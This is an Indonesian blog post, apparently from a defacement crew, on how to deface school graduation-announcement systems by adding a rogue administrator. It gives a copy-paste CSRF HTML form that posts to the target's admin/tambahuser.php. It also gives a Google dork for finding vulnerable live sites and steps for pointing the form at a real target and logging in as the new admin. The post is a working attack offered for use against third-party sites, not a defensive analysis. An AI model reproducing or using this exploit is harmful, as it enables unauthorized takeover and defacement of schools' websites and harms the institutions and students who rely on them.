Wednesday, June 10, 2020

Cara Deface Sistem kelulusan Add Admin

Yow Whatsapp guys,
Wellcome back with me.
 Kali ini kita akan membahas cara deface sistem kelulusan add admin, sama kyk cbt v2.8 add admin xixi..

Bahan bahan :
1.Kouta :v
2.Csrf :
Kalian copas aja..
<html>
<body>
<center>
<iframe width="560" height="315" src="https://www.youtube.com/embed/iQjtQvHwi4c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
<hr>
<form action="http://localhost.com/[path]admin/tambahuser.php" method="POST">
<input type="text" class="form-control" name="nama" placeholder="Username" size="35">
<br>
<input type="text" class="form-control" name="username" placeholder="Spear" size="35">
<br>
<input type="text" class="form-control" name="pass" placeholder="Security" size="35">
<br>
<br>
<input type="submit" name="submit" id="submit" value="Simpan Data" class="btn btn-primary" onclick="tb_remove()">
</form>
<hr>
<h1> CODED BY SPEAR-SECURITY </h1>
<h2> Author Extinction </h2>
</body>
</html>
 Dork : intext:"Selamat datang di Sistem"
Author : Spear Security

Pertama kalian copy dan paste ke file csrf.html.
Kedua, ganti localhostnya jadi live target kalian.
Kalian masukan user dan password terserah kaliankalian >> klik simpan data. Jika berhasil akan seperti gambar dibawah.

Jika sudah kalian login, jika berhasil berarti vuln :D

Previous Post
Next Post

Hai Sahabat, Nama Saya Nararya dari Bali Salam Kenal Yhaa :D

0 Comments: